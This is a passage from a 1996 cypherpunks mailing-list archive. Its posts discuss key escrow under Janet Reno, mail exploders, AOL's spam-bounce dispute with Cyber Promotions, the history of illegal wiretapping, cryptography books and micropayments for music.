>> At 08:43 AM 6/17/96 -0400, Declan B. McCullagh wrote:
>> 
>> >I believe we used the term "email exploder" instead of "mailing list,"
>> >particularly in cross-examination and closing arguments, to convey the
>> >idea that such a device is often used for conversation, not just one-way
>> >communication.
>> 
>> Was this term invented during the hearings or has anyone heard of it before?

Perry> It is not common, but it used to be used in the early days a lot. I
Perry> don't think I've heard it much since '85 or so.

The term is used commonly in the Linux community due to the
vger.rutgers.edu bottleneck most of the development mailing lists go
through.  There's too much volume for one machine to handle, so
exploders are used to relay outgoing email by domain name.  This has
to mean that the subscriber list is distributed via the exploders,
though I'm not familiar with exactly how they're doing it.

At any rate, the way they are used put it in direct contradiction to
Declan's quote above, since they are *only* used as a broadcast
mechanism.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 19 Jun 1996 09:30:38 +0800
To: cypherpunks@toad.com
Subject: Re: Federal key registration agency
Message-ID: <199606181838.LAA08913@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:27 PM 6/18/96 +0200, TM Peters wrote:
>Compuserve Online Today Daily Edition, 15 June 1996:
>
>Attorney General Janet Reno is advancing a plan to establish a new agency
>overseeing all digital encryption, saying that would make it tougher for
>criminals and terrorists to use the Internet to carry out crimes.
[...]
>Reno added, "We look only to make existing law apply to new technology,"

Such a claim is bogus.  "existing law" already "applies" to new technology.  
It's just that this only means that cops think they have a right to wiretap. 
 It does not mean that they are able to usefully understand the meaning of 
what they hear.


>adding new computer programs designed to crack the new complicated
>encryptions take too long to be useful to law enforcement. 

Like a billion years too long, huh?

> "Some of our
>most important prosecutions have depended on wire taps."

But is the average citizen substantially impacted by crimes that would be 
assisted by good encryption?  Probably not.  

>She also said registration of keys might end up being a worldwide
>requirement, since the Internet is used increasingly for international
>communication, commerce, and criminal enterprise.

She forgot to mention REVOLUTION.

>Reno told the group that effectively regulating electronic encryption will
>depend on finding a balance between protecting privacy interests while
>stopping criminals from cashing in on the new technology.

I see no need for a "balance."  I think that the advent of good encryption 
has the effect of increasing the security of individuals.


>"If we do our job right citizens will enjoy the Information Age without
>being victimized" by high technology, Reno said.

Maybe she should have said, "without toppling the government-employed 
parasites from their positions of power."



>United Press International
>Charles Bowen

Another one of those organizations threatened by media-bypass.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 19 Jun 1996 07:03:25 +0800
To: David Rosoff <drosoff@arc.unm.edu>
Subject: Re: Applied Cryptography - used copy?
In-Reply-To: <1.5.4.16.19960614211928.326fad06@arc.unm.edu>
Message-ID: <Pine.LNX.3.91.960618113856.32248D-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


      Hi,
          Didn't I read that with the new Applied Cryptography there was a 
diskette or cd included that had all the programs on it? I noticed a copy 
at the B Dalton and when I looked at it it contained no cd or diskette. 
Was the aforementioned new edition with disk/cd a limited edition 
available through the mail only?
                       TIA,
                           moroni





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Date: Wed, 19 Jun 1996 10:43:38 +0800
To: liberty@gate.net (Jim Ray)
Subject: Micropayments, Anarchy, It's All The Same... ;P
In-Reply-To: <199606181405.KAA52510@osceola.gate.net>
Message-ID: <v03006f05adec4223c7d1@[204.162.75.169]>
MIME-Version: 1.0
Content-Type: text/plain


>>that is associated with any new technology should be better analyzed by the
>>few who care about the future rather than those who just worship the future
>>to ensure that the decisions which are made by this almighty 'market'
>>(again, I distinguish this from either the 'people' or the 'consumers')
>
>Er...just how did you draw that distinction? I seem to have missed it.
>I suppose that by believing the free marketplace best satisfies peoples'
>and consumers' needs (not perfectly, just best) that I am a worshiper
>here. So be it, but see if you can explain the difference between
>non-marketplace decisionmaking and bureaucrat decisionmaking for me.
>
>
>
The distinction that I'm making is that the 'market' is governed by both
consumers and producers.  As such, what the market will bear can and sometimes
does diverge from what consumers want.  Taking a really silly example, let's
say you want a blue car, but the auto industry decided that blue cars
constituted
too few of their sales to justify the purchase of blue paint.  However,
they did
this study in Malibu, where everyone wanted a red car, because some
statistician
felt that was the perfect demographic for their line of cars.  He was
wrong.  Now
middle America, who loves blue cars, can't get any.  They have to settle for
red cars as the next best thing.  Next year the market will probably
readjust and blue cars will again be available, but for the year the bulk
of consumers had little say in market decisions.  Producers can and will
also 'dump'
undesirable products on the market as we have all seen before.  Sometimes
consumers complain, sometimes they just groan and bear it.  But the fact of the
matter is that the 'market' is comprised of two main elements: 'consumers' and
'producers' and the market climate is not solely determined by consumers'
needs.
Bureaucratic (government) decision making is no better.  Keep in mind, however,
that capitalist organizations (producers) are themselves bureaucratic
institutions.  Therefore, bureaucracy plays a central role in the free
(sic) market.  A balance between the power of the public and private sector
generally
best represents the peoples' and consumers' needs.

How the market diverges from the polit is clear.  The market is only concerned
with consumers, and this leaves out the poor, who are undeniably part of the
polity.  In fact, if you take just the technology market, that market is
primarily
producer-to-producer (business-to-business) and the traditional consumer
(an individual or family) is a relatively recent addition to this market.
Interbusiness concerns still drive this market.


>>'rammed down their throats'.  Sometimes people forget that technologists
>>and their venture capitalist backers aren't the best representative sample
>>of the world's population, nor are they a reliable source of objective
>>information about the correlation between the 'market' and the 'polit'.
>
>They aren't the best, they are simply more reliable than Hillary
>Clinton and co. are.
>
>
There are two ways to go on this.  It's important to realize that while
government officials are professional politicans with all the moral and
ethical compromise
that this entails, they are also ultimately responsible to their
constituency.  The role of government is different than the role of
business, and I for one would
not be willing to give up democratic government (ragardless of its
hypocracies and flaws) in favor of a business bureaucracy as our national
ruling hegemony.

Businesses, especially ones governed by unmitigated capitalists, are
responsible
only to profit.  The social darwinist perspective of most capitalists is
such that
this profit can come at any cost, and things will 'work themselves out'
according to natural (sic) social selection.  This is a morally and
ethically dangerous
viewpoint to have.

The polity is supposed to be able to count on their government to be their
voice
of power against the transgressions of more powerful individuals at the top of
the capitalist power structure.  This is not usually the case, as
government officials rely on these powerbrokers for their jobs and
kickbacks, but at least in
the United States the people have theoretical constitutional recourses against
serious infringements of their rights.  While centralized government has
serious
problems, weakening the federal protection of the bill of rights would
serve only
to increase the ability of the powerful to abuse the polity (and create
chaos since 50 different sets of state laws would provide an amazing web of
loopholes
for would-be tyrants).

Our government is supposed to be kept in check by the people, and I believe
that
is what people like the Cypherpunks are and should be doing.  However, don't go
running to Laissez Faire capitalists as your comrades in arms in the
struggle to
keep powerful institutions out of your personal lives, because you'll be
more than
just disappointed if you help private sector powerbrokers whittle away the
protective powers of the public sector.

Morally I'm more Anarchist than Centrist, but I'm also willing to face reality.

>Agreed. The most forthright possible debate comes on cypherpunks IMO.
>The least forthright comes from the government/media complex. Crypto-
>anarchists aren't proposing utopia, just improvement -- which is a
>much easier standard to meet considering what we have. I am sure
>there will be problems and frauds, just as there were Ford Pintos.
>Note that the Pinto phenomenon was possible in spite of pervasive
>and growing govt. regulation, yet the response: Even more regulation.
>Hmmmmm.
>JMR
>
>
There needs to be a balance between too much regulation, and too little.
The public sector has a system of checks and balances which doesn't always
work, but is institutionalized and respected.  The private sector, however,
is not so accountable and their only checks and balances are the laws that
we the people are obligated to insist be enforced.  Morality and justice
break down easily in the face of bribes and hush-money, but with an
institutionalized system of justice there is at least a modicum of
accountability which is necessary for a society(ies) which is far too
immature for true Anarchism.

Keep in mind the role that capitalists played along side the government in
Nazi Germany, (unchecked) power corrupts - regardless of whether you're in
the public sector or the private sector.  (Yes, capitalism was technically
regulated in Nazi Germany, but that is not the point.)

I am as unwilling to support Laissez Faire capitalism as I am to support
an intrusive and restrictive government.

ttl
Stephan

-------------------------------------------------------------------
This signature has been kidnapped by space aliens.
If you find it you can call (415) 703-8748.
I work for Studio Archetype, and they don't find any of this funny.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wxfield@shore.net (Warren)
Date: Wed, 19 Jun 1996 08:06:29 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Fuseable Links - no guarantees??
Message-ID: <v02140700adec85bc80af@[204.167.110.204]>
MIME-Version: 1.0
Content-Type: text/plain





>I don't know of any modern chips that have "ceramic coatings." (Some chips,
>esp. CPUs, are still ceramic-packaged, but in these cases the metal or
>ceramic lids are easily removed.)
>
>Most chips are plastic-packaged, and plasma ashers and/or chemical baths
>will expose the chip surface easily enough.

Yep....I guess my age was showing  ;-)


_______
Warren Crossfield
Programmer/MacOS
"Buy a Pentium - so you can restart Windoze faster!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 18 Jun 1996 23:59:23 +0800
To: cypherpunks@toad.com
Subject: Re: "Mail Exploders"
Message-ID: <199606181221.MAA28806@pipe1.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   On Nerd AOL using explosive mail, this Cyberia-L pointer:  
  
      http://infolawalert.com/stories/061496a.html  
 
   [Excerpts]  
 
   Cyber Promotions sends a collection of short ads, written 
   as if they were newspaper classifieds, to upward of 900,000 
   recipients, 600,000 of whom are America OnLine subscribers. 
 
   America OnLine contends that its computer systems have been 
   swamped by Cyber Promotion's mass mailings, especially when 
   5,000 undeliverable messages start to pile up each day. ... 
 
   When the mailings continued, an AOL employee collected a 
   bunch of Cyber Promotions's undeliverable messages and 
   redirected them to UUNET, a large Internet service provider 
   used by Cyber Promotions. 
 
   According to Cyber Promotions' complaint, this "stunt, 
   known as an 'e-mail bomb,' was knowingly and maliciously 
   sent to UUNET by AOL in order to severely tie up and/or 
   bring down UUNET's computer system." UUNET subsequently 
   cancelled Cyber Promotion's account. 
 
   According to Cyber Promotions' complaint, AOL bombed 
   another service provider used by Cyber Promotions. ... 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Pak <vulcao@netvision.net.il>
Date: Tue, 18 Jun 1996 21:59:57 +0800
Subject: David Kahn's "The Codebreakers", a new version. (question)
Message-ID: <31C67EFC.167E@netvision.net.il>
MIME-Version: 1.0
Content-Type: text/plain


Hi there.

  I have noticed while browsing through http://www.amazon.com
that in December 1996 a new version of "The Codebreakers" will be
published. The complete title says:
"The Codebreakers : The Comprehensive History of Secret Communication
from Ancient Times to the Internet"

Does anyone know if it will also include the complete 1967 edition,
or just the abridged 1973 one? I have managed to locate one copy of
the 1967 edition in our central library and found that there is quite
a lot of information that I fear the writer might want to ommit in this
new edition.
Does anyone have any more info about it?

Thanks a lot,
Michael Pak
Tel-Aviv
Israel.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Wed, 19 Jun 1996 09:45:02 +0800
To: attila <attila@primenet.com>
Subject: Source Laundering <was: You bet they have/are: NSA/CIA to snoop INSIDE theU.S.???>
Message-ID: <v02140b01adec77b9e9ea@[206.243.160.205]>
MIME-Version: 1.0
Content-Type: text/plain


        Mr. Nobody, an anonymous source of no repute, posted a pretty savvy
analysis of the politics of unauthorized wiretaps a week back:

>   anyone who believes the FBI and a host of other U.S. agencies even
>   less scrupulous does not wiretap without permits, has been standing
>   behind the door. generally, it does not matter if the information
>learned is
>    admissable in court  --they never admit wiretapping in the first place as
>    the agency themselves, in many cases, *did*not*wiretap*  --but the
>  agency does buy info from usually unsavory "contractors" who do wiretap.

        This conforms to my information too.  Back in the mid-80s, I  took
a wiretap counterintelligence class with a lot of cops, PIs, and oil
company securitymen.  (The quietest guy in the class, a balding little
whimp at the tech bench behind me, was a PI by the name of John Walker, who
later drew some attention with his overseas business interests.  The
weirdiest guy in the class was another PI who kept trying to talk to the
other guys about their work but was jerked around because everyone knew he
was always wired and at the end of the day would rush back to his hotel
room to put the tapes through a voice stress analyser.  I would have said
the most dangerous guys in the room were the grizzled Malasian oilmen, but
in hindsight Walker probably takes the prize.)

        The instructors were big Ray Jarvis (now of Jarvis Security,) an
ex-Marine reputed to have recently been the CIA's top wireman, and Allan
Bell (now of Dektor Counterintelligence,) the former director of the US
Army's spy shop R&D (who probably has as many secret patents as Friedman
did) -- both smart, thoughtful, amiable guys who knew their tradecraft
cold.

        What I remember most of the week long class was Ray Jarvis standing
before my classmates and estimating that maybe 10-15 percent of the
domestic wiretapping and bugging -- circa '85 -- by US police agencies was
legally authorized.  He paused and looked around the room for the
consensus. Half the room (mostly big city US cops) paused, looked off in
the distance for a moment, then nodded.

         My sense is that lawmen typically planted the relevant information
in the hands (or mouths) of a maluable "trusted source" when they did the
wire themselves.  If a subcontractor did it for them (on a purposely vague
assignment,) they just didn't ask how the "trusted source" managed to get
the information.  Either way, it worked like money laundering.  Source
laundering, you could call it.

        The cops didn't seem to view themselves as angels, but they were
usually utterly certain the guys they were targeting were the scum of the
earth.  Maybe they were. My expectation was that most of the illicit wires
would be focused on the drug trade (where cops feel like the Border Patrol
in El Paso, hopelessly outclassed by their opponents) but -- at least at
that time -- the scuttlebutt seemed to indicate it was much more broadly
used in criminal investigations. Both wiretaps and bugs are just so damn
easy to place, so cheap, so deniable, and (done properly) so untracable,
the temptation was virtually irresistable.  And there seemed to be a whole
subculture of master wiremen, trained by the US Govt, accepting bids from
both the Law and corporate security agents.

        (Outside the US, particularly in the oil business, it sounded like
the Wild West before Judge Bean showed up.   I've never doubted that the
cost of a DES-cracking special purpose computer has been buried among the
expense chits of many multinationals, certainly in the Big Oil Government
budgets.  I'd love to talk to the NSA guys who went in with Desert Storm to
find out what the Iraqis picked up from Kawaiti government/oil IS
installations;-)

        I don't expect much has changed, except everything has gotten
smaller, cheaper, and (with datacom) vastly more automated.  What those
guys knew in the 80s were the phone systems (poor design left many PBXs
with back doors, some of which could even be triggered remotely) but we've
all learned new tricks -- and the NSA and others always concentrated on
CompSec.

>        as for the NSA/CIA spying on US citizens --they dont, they spy on
>    British citizens with facilities provided by M5 and M6.  in return,
>    British M5/6 agents spy on U.S. citizens from Langely or Gaithersberg, or
>    wherever.  The fact they just happen to share information is an
>    "accident."

         In this, I doubt Mr. Nobody.  I can't see either the Brits nor the
Yanks willing to trust the other nation's bureaucratic system to keep
in-country spying secret.  The rule was: governments leak... eventually.
And the fallout of Revelation would be awesome.  (And there were so many
safer options.)

        I suppose, however, Nobody's scheme fits the "laundered source"
model too.  I recall talk of this sort of arrangement mostly to cover US
citizen to US citizen phone links across the US border.  I'm not even sure
the NSA couldn't legitimately do this, but after the Church Committee
hearings in the 1970s, everyone wanted to keep their numbers low.  (The
extreme was the FBI, of course, which would show up annually to report
what? 7 or 11 authorized wiretaps for the year.   Everyone barely able to
control their snickers.)

        My apologies if Memory Lane took up too much bandwidth, but the
politics of crypto have a heritage that's ever more relevant.  (Witness all
the direct and indirect reference to Kahn and Bamford's work on this List.)

        A thought:  Being pessimistic lately, and assuming our elected US
pols continue their subservience to the spy agencies, I have a question.
How difficult would be it to concoct a encryption-based scheme which would
hold escrow keys in some sort of serialized time-sensitive one-way account
-- a device that would make it all but impossible to get a key out of the
account without leaving a permanent record that it was retrieved.  How many
were retrieved?  When? By whom?

        Is there such a scheme?  How does/could it work?

        In defending privacy,  Accountability is a very powerful weapon.
(Remember those FBI reports of 7-11 wiretaps?) I'd love to see such a
tamperproof recording device imposed upon the FBI's access to its new
Master Wiretap circuits, for example -- with a legislatively-mandated
revelation of the unforgable results,  something comparable to the current
law in criminal cases, and maybe with some 5-year sunshine provison for
national security cases.

        Such a scheme might be all we can get if this Administration or a
future one gets a version of Clipper mandated.

        Cynics like many of you on this list may not realize how
desperately these guys want to keep to the shadows.  Bright Lights and
Accountability ought to be a Cypherpunk Goal -- even when the tide is
running against us.  A well-documented tamperproof accounting scheme to
document the use of these intrusive powers could result in a potentially
powerful piece of legislation.

        Suerte,
                        _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@wero.cs.byu.edu>
Date: Wed, 19 Jun 1996 14:00:28 +0800
To: cypherpunks@toad.com
Subject: Re: FYA: SafE Mail Corporation
In-Reply-To: <01BB5C9B.68A2B300@geeman.vip.best.com>
Message-ID: <m2n320aoy9.fsf@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


geeman@BEST.COM ("geeman@best.com") writes:

> 
>                    |  SafE Mail(TM)              |   RSA  (RC4+MD5)
> -------------------+-----------------------------+--------------------

>  Best Attack       | No known way                | Statistical

Hmm, I suppose "Captain Crunch Decoder Ring" doesn't count as a "known way".

Incidently, I read this through nntp.hks.net, which has 75 messages available.
It's been a long time since hks was serving cpunks, I hope this means they're
back up.

Don
-- 
<don@cs.byu.edu> http://students.cs.byu.edu/~don  PGP 0x994B8F39  fRee cRyPTo!
  "It is not worth an intelligent man's time to be in the majority.  By 
  definition, there are already enough people to do that." - G. H. Hardy
** This user insured by the Smith, Wesson, & Zimmermann insurance company **




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pascal Mattiocco <ir003022@interramp.com>
Date: Wed, 19 Jun 1996 08:46:26 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <31C6F6B2.2D6C@interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 19 Jun 1996 08:35:03 +0800
To: cypherpunks@toad.com
Subject: Re: Federal key registration agency
In-Reply-To: <199606181427.QAA10162@ns.calvacom.fr>
Message-ID: <v03006f08adec99aa5e9d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 AM -0400 6/18/96, TM Peters wrote:
> "If we do our job right citizens will enjoy the Information Age without
> being victimized" by high technology, Reno said.
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Just by their government. Sheesh...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 19 Jun 1996 12:26:22 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: example: microcurrency & music
In-Reply-To: <199606180545.BAA03098@unix.asb.com>
Message-ID: <199606182042.NAA01101@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Deranged Mutant nicely expands on the royalty system for
musicians via radio I was alluding to. I'm glad a person with
firsthand knowledge of this can speak on it, because I think
in the future, people may look back on the radio royalty
system as one of the first examples of a microcurrency-like
system supporting intellectual property without a lot of
laws or roving cyber policemen protecting copyrights.

it seems to me many believe that you can only make money
on intellectual property if copyright laws are strengthened
and enforced with an iron fist. I tend to suspect however
that people are generally willing to support intellectual
property. what is definitely true is that you are going
to have scofflaws and pirates that try to cheat the system--
but you will have those even with laws. as long as there
is enough revenue to support some industry, I don't think
one can really make a good case for creating draconian
restrictions such as the whitehouse or some other congressional
committees/ studies are currently proposing for copyright law.

>> a technology that has evolved by which radio stations pay music
>> companies whenever they play artists songs. (if any cpunks could
>> elaborate on this system, I think it is an excellent preliminary
>> example of how a microcurrency-like system would interact with
>> a copyright situation). 
>
>Excellent example? I dunno. At the non-commercial station I work, 
>once a year or every other year ASCAP or BMI, for a two week period, 
>wants our playlists... not the usual playlists, but detailed ones 
>which even the most anal-retentive people hate to fill out: the 
>performer, the song writer (not always the same), album and song 
>titles, record label, and if music is ASCAP, BMI, etc.  Includes not 
>only songs but them music, background music, etc.

ok, so the form that it takes involves a lot of paper work for you.
I was under the impression that commercial stations had it all 
automated, is this not correct? so what effectively happens is that
they play whatever they want, and the billing system will take
care of the correct allocations. it seems to me a playlist ought
to be computerized anyway, eh? are you suggesting your radio station
is doing it all by hand?  wouldn't this generally be the exception?

>I don't remember the rates, but non-commercial stations pay a lower rate than 
>commercial ones.  Royalties are supposedly divied out to songwriters 
>(and performers?) or record companies based on how much airplay they 
>received, which I guess is averaged out for the whole year.  I don't 
>know if they survey all radio stations around the same time or space 
>it out for different areas and different stations throughout the 
>year.

what you are seeing is record companies tailoring the price of their
"product" to different markets. now imagine that all of the above could
be replaced by a system whereby individual artists release their
recordings digitally and totally bypass the media industry bureacracy.
it's enough to give a gluttonous mogul massive nightmares <g>. I believe
such a thing will be happening in the near future. 

imagine radio stations that run over web pages-- I mean, literally, anyone 
could create their own playlists, programming, and radio stations in the
exact way that people select arbitrary material to put on their
web pages today. imagine software written to pick
different music. imagine a microcurrency system that pays the 
songwriters & musicians automatically when songs are played anywhere
in cyberspace. these are the kinds of ideas that microcurrency makes
possible to anyone with a smidgeon of imagination.

>  Touch luck for artists who get some airplay but not enough to 
>make it on the lists, of course.

theoretically the lists record exactly what radio stations play.
an automated system is possible in which there is no fudge factor
due to reporting discrepancies. furthermore keep in mind that even
if these low-played artists got on the lists, they may not
make enough money to make it worth putting them there. remember
the playlists are used to measure the number of times songs are
played and pay out accordingly, isn't that correct?

>Digital area: possibility that people will feel because it's 
>computerized, EVERYTHING can be kept track of.    This is 
>problematic, aside from privacy reasons, because the big royalty 
>makers get less and the smaller people get more. 

sorry, again I feel that privacy is a term that is often misused
as I have been pointing out in another thread. how is it a violation
of privacy if a system keeps track of exactly how often songs are played,
for the purposes of compensation? what you are alluding to is the
fudge factor that is involved in reporting. sorry, I think you are
abusing the term "privacy" if you are using it to apply to 
situations involving minor duplicities such as false reporting. however
this would be a classic cpunk dogma, such as in conflating the idea
of tax evasion or identity subterfuges with "privacy"..

 Parallel with 
>experiemtal Nielson-ratings tech... a special cable box that did the 
>monitoring for you, and even had an electronic eye that could tell if 
>anyone was in the room, or if they were sleeping or reading the paper 
>rather than watching...

but this is not analogous at all.  imagine that the system knows
how often a song is played, but doesn't keep track of who played
it. such a system is straightforward to implement in cyberspace.
another example of how I have been suggesting that information
collection (related to billinj) and privacy are not always in conflict.
and frankly I'm annoyed at how easily people are mixing up these
clearly distinct ideas.

 apparently every station got much lower 
>ratings than when people generously filled out booklets, so the 
>stations threatened to set up an alternate system, so I don't know if 
>that system was adopted.

oh, so a theoretically more accurate system gave different results, so 
therefore the more accurate system is BAD? classic "status quo" logic.
the market ultimately will not support this argument more than a 
temporary amount of time. a given company with a monopoly on ratings
collection can only enforce their ideas as long as they have a 
monopoly. if someone else comes out with a better rating system
that gives different results, the market will still tend to 
gravitate toward it. not necessarily immediately.

>I'm curious as to how royalities are divied up from the cassette tax, 
>since everyone with blank casssettes is, of course, violating 
>copyrights according to some logic.

are you saying there is now a tax on blank cassettes? I wasn't aware
of that.

>Will people want royalities for reselling?  There was a flack a few 
>years ago from some big record distributors over used CD sales.  They 
>refused to supply some of the big chains if they continued to sell 
>used CDs without giving them a cut.

I know, big media conglomerates are always ranting at congress etc.
the DAT tape stuff is a good example. I suspect the media 
dinosaurs don't have the slightest whiff of a clue about what
the future is going to entail. as J.G. once said of the media
merger mongering, "rearranging the deck chairs on the titanic".
its funny how much big bureacracies begin to look like the government,
no matter what side of the coin, public or private. the incident
you refer to reminds me of the ingenuity that government bureacrats
look for ways to tax novel changes in the economy.

in their current form of massive scrape-off for promoting
the bureacracy (listen to Pink Floyd's song on the subject, "which 
one of you is pink?") media conglomerates are doomed to extinction in the 
very near future-- the day that microcurrency becomes feasible.
it will tend to become a sellers' market, where the sellers are
artists. of course none of this is even remotely conceivable
by today's standards. that's why it's entirely correct. <g>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Wed, 19 Jun 1996 09:07:36 +0800
To: cypherpunks@toad.com
Subject: Re: "Mail Exploders"
Message-ID: <v02140b03adec9a570eca@[206.243.160.205]>
MIME-Version: 1.0
Content-Type: text/plain


        Wonderful tale!  I can see that -- maybe, just maybe -- AOL or
another targeted online community (a semi-moderated mailing list or even a
semi-moderated newsgroup) could be slapped for just bouncing the SPAM back
at the sender.

        I bet they could get away with it, however, if they appended a
brief polite notice that this mailing exceeds some (anti-spam) perimeters
that the subscribers of AOL (or other online community) agreed -- in their
intial subscriber contracts -- to have AOL refuse for them.

        (Which text, of course, would add to the reply mail burden for the
Spammer's IAP.)

        The only meaningful control on SPAM I can see is to start enforcing
a chain of contracts that forbid it (without reference to content) from the
backbone back through the IAPs to the users.  (I think Long-Morrow at Yale
had a nice paper on this a couple of years back.) But this sort of
auto-return mechanism could make a dent on the super-Spanners now.

        Yea for AOL!

        Suerte,
                        _Vin

>   On Nerd AOL using explosive mail, this Cyberia-L pointer:
>
>      http://infolawalert.com/stories/061496a.html
>
>   [Excerpts]
>
>   Cyber Promotions sends a collection of short ads, written
>   as if they were newspaper classifieds, to upward of 900,000
>   recipients, 600,000 of whom are America OnLine subscribers.
>
>   America OnLine contends that its computer systems have been
>   swamped by Cyber Promotion's mass mailings, especially when
>   5,000 undeliverable messages start to pile up each day. ...
>
>   When the mailings continued, an AOL employee collected a
>   bunch of Cyber Promotions's undeliverable messages and
>   redirected them to UUNET, a large Internet service provider
>   used by Cyber Promotions.
>
>   According to Cyber Promotions' complaint, this "stunt,
>   known as an 'e-mail bomb,' was knowingly and maliciously
>   sent to UUNET by AOL in order to severely tie up and/or
>   bring down UUNET's computer system." UUNET subsequently
>   cancelled Cyber Promotion's account.
>
>   According to Cyber Promotions' complaint, AOL bombed
>   another service provider used by Cyber Promotions. ...
>
>
>
>
>
>

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: long-morrow@CS.YALE.EDU
Date: Wed, 19 Jun 1996 09:11:31 +0800
To: vin@shore.net
Subject: Re: "Mail Exploders"
Message-ID: <199606181800.OAA18621@SPARKY.CF.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain



From: vin@shore.net (Vin McLellan)
>        The only meaningful control on SPAM I can see is to start enforcing
>a chain of contracts that forbid it (without reference to content) from the
>backbone back through the IAPs to the users.  (I think Long-Morrow at Yale
>had a nice paper on this a couple of years back.) But this sort of
>auto-return mechanism could make a dent on the super-Spanners now.

Actually the paper was written by our Assistant Chairman 
(Dunne-Bob@CS.Yale.EDU).  I only made the paper available via FTP, Gopher,
WWW and email.

ftp://www.cs.yale.edu/pub/dunne/jurimetrics/
gopher://www.cs.yale.edu/11/pub/dunne/jurimetrics/
http://www.cs.yale.edu/pub/dunne/jurimetrics/jurimetrics.html
mailto:majordomo@cs.yale.edu
                        ( put 'get sneakers jurimetrics.txt' in message body )
 
H. Morrow Long, Mgr of Dev., Yale Univ., Comp Sci Dept, 011 AKW, New Haven, CT
06520-8285,	VOICE:	(203)-432-{1248,1254}		FAX:	(203)-432-0593
INET: Long-Morrow@CS.Yale.EDU UUCP: yale!Long-Morrow BITNET: Long-Morrow@YaleCS
WWW:	http://www.cs.yale.edu/users/long-morrow.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Wed, 19 Jun 1996 10:01:48 +0800
To: Moroni <cypherpunks@toad.com
Subject: Re: Applied Cryptography - used copy?
Message-ID: <1.5.4.32.19960618180535.0069c35c@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 AM 6/18/96 -0400, you wrote:
>      Hi,
>          Didn't I read that with the new Applied Cryptography there was a 
>diskette or cd included that had all the programs on it? I noticed a copy 
>at the B Dalton and when I looked at it it contained no cd or diskette. 
>Was the aforementioned new edition with disk/cd a limited edition 
>available through the mail only?
>                       TIA,
>                           moroni
>
>
Mail only. And, of course, you have to live somewhere Schneier can legally
send you the stuff. $40 the set in MS-DOS, $120 for two-year sub., updated
2X/yr.

Will Rodger
Washington Bureau Chief
Inter@ctive Week





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 19 Jun 1996 08:53:09 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Pickle Angels?!?  (Humour)(Noise)
Message-ID: <199606181845.OAA01910@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 17 Jun 96 at 19:35, William Knowles wrote:

> On today's Sally Jesse Raphel was Curtis Swiva?
> founder of the Guardian Angels talking about his new record
> of eating pickles.  He plans to break the record for eating 
> 22 hot dogs in 12 minutes....

I can see it now...

"In a rather ironic twist of fate, Curtis Sliwa was the first person 
charged with violating the Communications Decency Act (upheld by the 
Supreme Court) after a web-surfer in Tennessee complained about 
digitized pictures of himself breaking the world's record for eating 
hot dogs which were posted on his web page..."


Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 19 Jun 1996 12:15:15 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Applied Cryptography - used copy?
